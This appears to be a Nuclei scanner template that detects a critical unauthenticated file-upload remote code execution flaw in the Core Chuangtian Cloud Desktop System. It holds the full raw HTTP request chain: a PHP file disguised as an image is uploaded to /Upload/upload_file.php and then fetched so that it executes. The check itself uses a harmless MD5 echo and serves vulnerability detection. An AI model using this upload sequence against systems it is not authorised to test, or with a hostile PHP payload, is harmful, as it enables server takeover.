id: core-chuangtian-cloud-rce

info:
  name: Core Chuangtian Cloud Desktop System - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: rce,fileupload,intrusive,cloud,chuangtian

http:
  - raw:
      - |
        POST /Upload/upload_file.php?l=test HTTP/1.1
        Host: {{Hostname}}
        Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv

        ------WebKitFormBoundaryfcKRltGv
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: image/avif

        <?php echo md5("core-chuangtian-cloud"); ?>
        ------WebKitFormBoundaryfcKRltGv--
      - |
        GET /Upload/test/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")'
          - 'status_code_2 == 200'
        condition: and

# digest: 490a0046304402203dc3f630102e60b1721735542a16f30c254a7264c93de260ce11978d2aab2c9b02207c1dd99972108e52f17ca19ecbac34fd810ab7bd944f38599a1ecabead7d3d07:922c64590222798bb761d5b6d8e72950
